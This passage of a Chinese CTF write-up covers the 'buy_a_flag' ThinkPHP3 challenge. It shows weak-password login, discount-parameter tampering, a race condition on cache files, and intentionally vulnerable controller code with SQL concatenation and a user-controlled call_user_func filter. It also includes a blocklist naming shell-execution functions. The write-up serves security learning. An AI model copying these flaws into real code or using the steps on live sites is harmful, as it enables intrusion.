<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <title>
        2021 Aurora内部赛 |
        
        A.M.|P.M.
    </title>
    <link rel="shortcut icon" href="/images/logo.svg">
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/css/font-awesome.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"example.com","root":"/","path":"search.xml"};
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":true},"style":{"primary_color":"#0066CC","avatar":"/images/avatar.png","favicon":"/images/logo.svg","img_position":"left","left_side_width":"260px","content_max_width":"900px","hover":{"shadow":true,"scale":false},"first_screen":{"enable":true,"background_img":"/images/bg.svg","description":"Keep writing and Keep loving."}},"local_search":{"enable":true,"trigger":"auto","unescape":false,"preload":true},"version":"3.0.4"};
    KEEP.language = {"search":"Search...","prev":"Prev","next":"Next","prev_posts":"Prev posts","next_posts":"Next posts","page":"Page %d","recent_posts":"Recent Posts","share":"Share","powered_by":"Powered by %s","theme":"Theme","rss_feed":"RSS Feed","category":"Category","categories":"Categories","tag":"Tag","tags":"Tags","tagcloud":"Tag Cloud","comment":"Comment","home":"Home","archive":"Archive","archives":"Archives","about":"About","site_uv":"Visitor Count","site_pv":"Totalview","links":"Links","link":"Link","top":"TOP","read_more":"Read more","wordcount":"Words","min2read":"Mins","changelog":"Changelog","copyright":{"author":"Post author","title":"Post title","link":"Post link","create_time":"Create time","license_title":"Copyright Notice","license_content":"All articles in this blog are licensed under %s unless stating additionally."},"ago":{"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days age","week":"%s weeks age","month":"%s months age","year":"%s years age"}};
  </script>
<meta name="generator" content="Hexo 5.3.0"></head>


<body>
<div class="page-container">

    

    <header class="page-header">
        <div class="header-progress"></div>
    </header>

    <main class="page-main">

        <div class="page-main-content">

            <div class="page-main-content-top">
                <header class="header-wrapper">

    <div class="header-content">
        <a class="logo-title" href="/">
            A.M.|P.M.
        </a>

        <ul class="menu-list">
            
                <li class="menu-item">
                    <a class=""
                       href="/"
                    >
                        HOME
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/archives"
                    >
                        ARCHIVES
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/categories"
                    >
                        CATEGORIES
                    </a>
                </li>
            
        </ul>

        <div class="menu-bar">
            <div class="menu-bar-middle"></div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">HOME</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">ARCHIVES</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">CATEGORIES</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


            </div>

            <div class="page-main-content-middle">

                <main class="main-content normal-code-theme">

                    
                        <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">2021 Aurora内部赛</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/avatar.png">
                </div>
                <div class="info">
                    <div class="author">
                        <span>John_Frod</span>
                        <span class="level">Lv4</span>
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fas fa-calendar"></i> 2021-05-10 15:18:04
    </span>
    
        <span class="article-categories article-meta-item">
            <i class="fas fa-folder"></i>
            <ul>
                
                    <li>
                        <a href="/categories/CTF/">CTF</a>
                    </li>
                
            </ul>
        </span>
    
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i> <span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <h1 id="2021-Aurora内部赛"><a href="#2021-Aurora内部赛" class="headerlink" title="2021 Aurora内部赛"></a>2021 Aurora内部赛</h1><br/>

<h2 id="buy-a-flag"><a href="#buy-a-flag" class="headerlink" title="buy_a_flag"></a>buy_a_flag</h2><blockquote>
<p>看了2遍大概是看懂了</p>
<p>以下内容是出题人的博客：<a class="link"   target="_blank" rel="noopener" href="https://oatmeal.vip/ctf-wp/buyaflag/" >https://oatmeal.vip/ctf-wp/buyaflag/<i class="fas fa-external-link-alt"></i></a></p>
</blockquote>
<h3 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h3><h4 id="MVC框架"><a href="#MVC框架" class="headerlink" title="MVC框架"></a>MVC框架</h4><p>tp3是一个基于MVC和面向对象的轻量级PHP开发框架，MVC即Model-View-Controll的缩写。</p>
<p>模板Model编写Model类，负责数据的操作；</p>
<p>视图View编写html文件，负责前台的页面显示；</p>
<p>控制器Controll编写类文件，负责后端的操作等等。</p>
<h4 id="URL路由模式"><a href="#URL路由模式" class="headerlink" title="URL路由模式"></a>URL路由模式</h4><p>tp3有几种路由模式：普通模式、PATHINFO模式、REWRITE模式、兼容模式。控制路由方式有配置文件中的参数决定，这题由于Nginx常规配置不支持PATHINFO，我使用了兼容模式。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;URL_MODEL&#x27;</span>             =&gt;  <span class="number">3</span>,       <span class="comment">// URL访问模式,可选参数0、1、2、3,代表以下四种模式：</span></span><br><span class="line"><span class="comment">// 0 (普通模式); 1 (PATHINFO 模式); 2 (REWRITE  模式); 3 (兼容模式)  默认为PATHINFO 模式</span></span><br></pre></td></tr></table></figure>
<h4 id="Application目录"><a href="#Application目录" class="headerlink" title="Application目录"></a>Application目录</h4><p>Application是主要应用目录，存放几乎所有的Coding。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">Application</span><br><span class="line">├─Common         应用公共模块</span><br><span class="line">│  ├─Common      应用公共函数目录</span><br><span class="line">│  └─Conf        应用公共配置文件目录</span><br><span class="line">├─Home           默认生成的Home模块</span><br><span class="line">│  ├─Conf        模块配置文件目录</span><br><span class="line">│  ├─Common      模块函数公共目录</span><br><span class="line">│  ├─Controller  模块控制器目录</span><br><span class="line">│  ├─Model       模块模型目录</span><br><span class="line">│  └─View        模块视图文件目录</span><br><span class="line">├─Runtime        运行时目录</span><br><span class="line">│  ├─Cache       模版缓存目录</span><br><span class="line">│  ├─Data        数据目录</span><br><span class="line">│  ├─Logs        日志目录</span><br><span class="line">│  └─Temp        缓存目录</span><br></pre></td></tr></table></figure>
<h4 id="传参方法-I"><a href="#传参方法-I" class="headerlink" title="传参方法 I()"></a>传参方法 I()</h4><p>I方法用来传参，其用法格式如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">I(<span class="string">&#x27;变量类型.变量名/修饰符&#x27;</span>,[<span class="string">&#x27;默认值&#x27;</span>],[<span class="string">&#x27;过滤方法或正则&#x27;</span>],[<span class="string">&#x27;额外数据源&#x27;</span>])</span><br></pre></td></tr></table></figure>
<p>第一个参数为传参的类型例如POST或者GET等等；后面三个参数可选，二三分别是默认值以及过滤方法，后面会讲到，本质上调用了<code>call_user_func()</code>。</p>
<h4 id="缓存方法S"><a href="#缓存方法S" class="headerlink" title="缓存方法S()"></a>缓存方法S()</h4><p>设置缓存的方法有两种，F方法和S方法。例子如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">F(<span class="string">&#x27;data&#x27;</span>, <span class="string">&#x27;phpinfo()&#x27;</span>); </span><br></pre></td></tr></table></figure>
<p>F方法缓存的文件名问data.php，生成文件位于Runtime/Data，没有经过加密。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">S(<span class="string">&#x27;data&#x27;</span>, <span class="string">&#x27;phpinfo()&#x27;</span>);</span><br></pre></td></tr></table></figure>
<p>S方法生成的缓存文件名经过md5编码，生成文件位于Runtime/Temp/，生成文件时序列化文件内容，并会注释掉文件内容，例如当你传入了1：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//000000000000s:1&quot;1&quot;;</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>该生成文件的方法并不安全，注释可以使用一些特殊字符来换行绕过。</p>
<p>编码后的文件名也是可以被猜解的，为了避免被拆解，可以设置变量<code>DATA_CACHE_KEY</code>。</p>
<h3 id="弱口令登录"><a href="#弱口令登录" class="headerlink" title="弱口令登录"></a>弱口令登录</h3><p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510111304.png" alt="img"></p>
<p>Bootstarp写的前端，迅速确定功能点：购买、登录、关于、登出，其中后两个功能可以不看，而购买功能需要登录。</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510111341.png" alt="img"></p>
<p>直接看登录点，有三个地方有提示，主页的注释页：</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510111350.png" alt="img"></p>
<p>提示存在一个guest账户，使用guest/guest就可以成功登陆。</p>
<h3 id="POST-discount"><a href="#POST-discount" class="headerlink" title="POST $discount"></a>POST $discount</h3><p>登录之后的购买功能，buy后提交参数折扣<code>$discount</code>，burp抓包设置为0即可购买，源码两处地方提示了<code>$discount</code>参数。</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510111528.png" alt="img"></p>
<p>后台的比较由于没有对<code>$discount</code>进行类型转化，这里的<code>$discount</code>传入数组等非数字类型的变量都可以成功。</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510111551.png" alt="img"></p>
<p>下载code</p>
<h3 id="tp3代码审计"><a href="#tp3代码审计" class="headerlink" title="tp3代码审计"></a>tp3代码审计</h3><p>先找到控制器路径<code>shop/Application/Home/Controller/IndexController.class.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"> </span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Home</span>\<span class="title">Controller</span>;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">use</span> <span class="title">Think</span>\<span class="title">Controller</span>;</span><br><span class="line"> </span><br><span class="line"><span class="comment">//----------------------------------</span></span><br><span class="line"><span class="comment">// 亲爱的同事你好。</span></span><br><span class="line"><span class="comment">// 当你看到这些代码的时候，意味着我已经从Aurora公司离职了。</span></span><br><span class="line"><span class="comment">// 意味着接下来这一坨像屎一样的项目需要你来维护了。</span></span><br><span class="line"><span class="comment">// 如果你尝试修改这些代码，这一定是一项错误的决定。</span></span><br><span class="line"><span class="comment">// 不要骂我为什么不写注释，因为代码虽然是我写的，但是我自己都看不懂，所以劝你别动！</span></span><br><span class="line"><span class="comment">// 千万别动！千万别动！千万别动！重要的事情说三遍！</span></span><br><span class="line"><span class="comment">// 这家公司每周都在996，经常加班，蓝腾还不发加班工资，偶尔007。</span></span><br><span class="line"><span class="comment">// 面试的时候说的那些福利都是骗人的，有时候还拖欠工资，不买社保，不要公积金。</span></span><br><span class="line"><span class="comment">// 还有一件很重要的事情，公司女程序员极少，所以想要解决单身问题，基本是没戏了。</span></span><br><span class="line"><span class="comment">// 深圳那么多公司，赶紧考虑下一家吧。</span></span><br><span class="line"><span class="comment">// - Oatmeal</span></span><br><span class="line"><span class="comment">//----------------------------------</span></span><br><span class="line"> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">IndexController</span> <span class="keyword">extends</span> <span class="title">Controller</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// ...数据校验代码</span></span><br><span class="line">        rlog(<span class="variable">$return</span>[<span class="string">&#x27;code&#x27;</span>], <span class="string">&#x27;log&#x27;</span>);</span><br><span class="line">        <span class="comment">// ...渲染页面代码</span></span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">state</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// ...状态校验代码</span></span><br><span class="line">        rlog(<span class="variable">$return</span>[<span class="string">&#x27;code&#x27;</span>], <span class="string">&#x27;state&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">logout</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// ...状态校验代码</span></span><br><span class="line">        rlog(<span class="number">1</span>, <span class="string">&#x27;logout&#x27;</span>);</span><br><span class="line">        <span class="comment">// ...渲染页面代码</span></span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">buy</span>(<span class="params"><span class="variable">$filter</span>=<span class="literal">null</span></span>) </span>&#123;</span><br><span class="line">        <span class="comment">//HTTP协议，传输json需要添加请求头</span></span><br><span class="line">        header(<span class="string">&#x27;Content-Type:application/json; charset=utf-8&#x27;</span>);</span><br><span class="line">        <span class="variable">$username</span> = session(<span class="string">&#x27;username&#x27;</span>);</span><br><span class="line">        <span class="keyword">if</span> (!<span class="variable">$username</span>) &#123;</span><br><span class="line">            <span class="variable">$return</span>[<span class="string">&#x27;code&#x27;</span>] = <span class="number">0</span>;</span><br><span class="line">            <span class="variable">$return</span>[<span class="string">&#x27;message&#x27;</span>] = <span class="string">&#x27;你都没登录买你emoji呢&#x27;</span>;</span><br><span class="line">            rlog(<span class="variable">$return</span>[<span class="string">&#x27;code&#x27;</span>], <span class="string">&#x27;buy&#x27;</span>);</span><br><span class="line">            <span class="keyword">exit</span>(json_encode(<span class="variable">$return</span>));</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$gid</span> = <span class="number">5</span>;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">empty</span>(<span class="variable">$_POST</span>)) &#123;</span><br><span class="line">            <span class="variable">$discount</span> = <span class="number">1</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">if</span> (<span class="variable">$filter</span>) &#123;</span><br><span class="line">                <span class="variable">$filter</span> = think_filter(<span class="variable">$filter</span>)? <span class="literal">null</span>: <span class="variable">$filter</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="variable">$discount</span> = I(<span class="string">&#x27;post.discount&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$filter</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        rest();</span><br><span class="line">        <span class="variable">$return</span> = <span class="keyword">$this</span>-&gt;code(<span class="variable">$username</span>, <span class="variable">$gid</span>, <span class="variable">$discount</span>);</span><br><span class="line">        rlog(<span class="variable">$return</span>[<span class="string">&#x27;code&#x27;</span>], <span class="string">&#x27;buy&#x27;</span>);</span><br><span class="line">        <span class="keyword">echo</span> json_encode(<span class="variable">$return</span>);</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">code</span>(<span class="params"><span class="variable">$username</span> = <span class="string">&#x27;guest&#x27;</span>, <span class="variable">$gid</span> = <span class="number">5</span>, <span class="variable">$discount</span> = <span class="number">1</span></span>) </span>&#123;</span><br><span class="line">        <span class="variable">$info</span> = M(<span class="string">&#x27;good&#x27;</span>)</span><br><span class="line">            -&gt;WHERE(<span class="string">&#x27;gid=&#x27;</span> . <span class="variable">$gid</span>)</span><br><span class="line">            -&gt;FIELD(<span class="string">&#x27;gprice&#x27;</span>)</span><br><span class="line">            -&gt;SELECT();</span><br><span class="line">        <span class="variable">$user</span> = M(<span class="string">&#x27;account&#x27;</span>)</span><br><span class="line">            -&gt;JOIN(<span class="string">&#x27;shop_user on shop_account.id=shop_user.id&#x27;</span>)</span><br><span class="line">            -&gt;FIELD(<span class="string">&#x27;shop_user.id, currency&#x27;</span>)</span><br><span class="line">            -&gt;WHERE(<span class="string">&quot;username=&#x27;&quot;</span> . <span class="variable">$username</span>. <span class="string">&quot;&#x27;&quot;</span>)</span><br><span class="line">            -&gt;SELECT();</span><br><span class="line">        <span class="variable">$gprice</span> = <span class="variable">$info</span>[<span class="number">0</span>][<span class="string">&#x27;gprice&#x27;</span>];</span><br><span class="line">        <span class="variable">$currency</span> = <span class="variable">$user</span>[<span class="number">0</span>][<span class="string">&#x27;currency&#x27;</span>];</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable">$gprice</span> * <span class="variable">$discount</span> &gt; <span class="variable">$currency</span>) &#123;</span><br><span class="line">            <span class="variable">$return</span>[<span class="string">&#x27;code&#x27;</span>] = <span class="number">0</span>;</span><br><span class="line">            <span class="variable">$return</span>[<span class="string">&#x27;message&#x27;</span>] = <span class="string">&#x27;没钱你买你emoji&#x27;</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$return</span>[<span class="string">&#x27;code&#x27;</span>] = <span class="number">1</span>;</span><br><span class="line">            <span class="variable">$return</span>[<span class="string">&#x27;message&#x27;</span>] = <span class="string">&#x27;购买成功，这是CODE的地址：this_is_Code_and_Have_a_g00d_t1me.zip,祝您旅途愉快。&#x27;</span>;</span><br><span class="line">            <span class="variable">$data</span>[<span class="string">&#x27;currency&#x27;</span>] = <span class="variable">$user</span>[<span class="string">&#x27;currency&#x27;</span>] - <span class="variable">$info</span>[<span class="string">&#x27;gprice&#x27;</span>] * <span class="variable">$discount</span>;</span><br><span class="line">            M(<span class="string">&#x27;account&#x27;</span>)-&gt;filter(<span class="string">&#x27;strip_tags&#x27;</span>)-&gt;WHERE(<span class="string">&#x27;id&#x27;</span> . <span class="variable">$user</span>[<span class="number">0</span>][<span class="string">&#x27;id&#x27;</span>])-&gt;save(<span class="variable">$data</span>);</span><br><span class="line">        &#125;;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$return</span>;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到在执行完state、log、logout、buy操作之后，控制器会调用一个函数rlog()来操作传入的两个参数。跟进一下，在<code>/Application/Common/Common/function.php</code>：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 记录操作日志 支持不同事件</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> string $event 事件名称</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> string $code 传入的参数，记录事件成功与否</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@return</span> void</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">rlog</span>(<span class="params"><span class="variable">$code</span>=<span class="number">0</span>, <span class="variable">$event</span>=<span class="string">&#x27;&#x27;</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="variable">$log</span> = time();</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$event</span> == <span class="string">&#x27;log&#x27;</span>) &#123; <span class="comment">// 登录日志</span></span><br><span class="line">        S(<span class="variable">$log</span>, <span class="string">&#x27;log&#x27;</span> . <span class="variable">$code</span>,<span class="number">1</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="variable">$event</span> == <span class="string">&#x27;logout&#x27;</span>) &#123; <span class="comment">// 登出日志</span></span><br><span class="line">        S(<span class="variable">$log</span>, <span class="string">&#x27;logout&#x27;</span> . <span class="variable">$code</span>,<span class="number">1</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="variable">$event</span> == <span class="string">&#x27;buy&#x27;</span>) &#123; <span class="comment">// 购买日志</span></span><br><span class="line">        S(<span class="variable">$log</span>, <span class="string">&#x27;buy&#x27;</span> . <span class="variable">$code</span>,<span class="number">1</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="variable">$event</span> == <span class="string">&#x27;state&#x27;</span>) &#123; <span class="comment">// 状态日志</span></span><br><span class="line">        S(<span class="variable">$log</span>, <span class="string">&#x27;state&#x27;</span> . <span class="variable">$code</span>,<span class="number">1</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123; <span class="comment">//临时日志</span></span><br><span class="line">        S(<span class="variable">$log</span>, <span class="string">&#x27;temp&#x27;</span> . <span class="variable">$code</span>,<span class="number">1</span>);</span><br><span class="line">    &#125;rest();rest();</span><br><span class="line">    unlink(<span class="string">&#x27;Application/Runtime/Temp/&#x27;</span> . md5(<span class="variable">$log</span>) . <span class="string">&#x27;.php&#x27;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这函数看着有模有样，认真看或者Compare一下就知道其实是出题人自己加上去的函数。功能是通过S方法来缓存数据，生成缓存文件。</p>
<p>首先获得当前时间戳：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$log</span> = time();</span><br></pre></td></tr></table></figure>
<p>写缓存文件，如果传入的参数为<code>[&#39;log&#39;, &#39;logout&#39;, &#39;state&#39;, &#39;buy&#39;]</code>事件，将事件名和成功与否的状态码<code>$code</code>写入文件，文件名为当前时间戳的md5加密。</p>
<p>生成缓存文件后调用两次<code>rest()</code>;</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rest();rest();</span><br></pre></td></tr></table></figure>
<p>而<code>rest()</code>本质上是<code>sleep(1)</code>。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 休息函数</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">rest</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    sleep(<span class="number">1</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>也就是说这里会等两秒，之后删除文件。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">unlink(<span class="string">&#x27;Application/Runtime/Temp/&#x27;</span> . md5(<span class="variable">$log</span>) . <span class="string">&#x27;.php&#x27;</span>);</span><br></pre></td></tr></table></figure>
<p>这种写法很熟悉有没有，很容易想到是条件竞争，<code>rest()</code>是用来缓冲网络延时造成的干扰。</p>
<p>回头看<code>rlog()</code>函数，传入两个参数<code>$code</code>以及<code>$event</code>，其中<code>$code</code>会通过字符串拼接写入文件，那么要做的就是找到<code>$code</code>参数可控点。</p>
<h3 id="万能的call-user-func"><a href="#万能的call-user-func" class="headerlink" title="万能的call_user_func"></a>万能的call_user_func</h3><p>I方法的第三个参数过滤函数的调用实际上通过了<code>call_user_func()</code>。或者我们跟踪function.php中的<code>call_user_func()</code>，找到函数，或者直接开Compare比较一下都行，这里的代码不同很明显了。</p>
<p>我们跟进一下I方法：</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510113010.png" alt="img"></p>
<p>I方法在循环体内调用了函数<code>array_map_recursive</code></p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510113047.png" alt="img"></p>
<p>而我们接着找，控制器中获取<code>$discount</code>变量时调用了I方法，并且传入的第三个参数<code>$filter</code>，而第三个参数可控。</p>
<p><img src="https://raw.githubusercontent.com/JOHN-FROD/PicGo/main/blog-img/20210510113305.png" alt="img"></p>
<p>这里的$filter经过过滤确保传入的参数没有危险函数，但是没有过滤<code>rlog</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">think_filter</span>(<span class="params">&amp;<span class="variable">$value</span></span>)</span>&#123;</span><br><span class="line">    <span class="comment">// TODO 其他安全过滤</span></span><br><span class="line">    <span class="variable">$pattern</span> = <span class="string">&quot;select|insert|update|delete|and|or|\&#x27;|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex&quot;</span>;</span><br><span class="line"> </span><br><span class="line">    <span class="variable">$pattern</span> .= <span class="string">&quot;|file_put_contents|fwrite|curl|system|eval|assert&quot;</span>;</span><br><span class="line"> </span><br><span class="line">    <span class="variable">$pattern</span> .=<span class="string">&quot;|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore&quot;</span>;</span><br><span class="line"> </span><br><span class="line">    <span class="variable">$pattern</span> .=<span class="string">&quot;|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec&quot;</span>;</span><br><span class="line"> </span><br><span class="line">    <span class="variable">$vpattern</span> = explode(<span class="string">&quot;|&quot;</span>,<span class="variable">$pattern</span>);</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">foreach</span> (<span class="variable">$vpattern</span> <span class="keyword">as</span> <span class="variable">$v</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (preg_match(<span class="string">&quot;/<span class="subst">$value</span>/i&quot;</span>, <span class="variable">$v</span>)) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    <span class="comment">// 过滤查询特殊字符</span></span><br><span class="line">   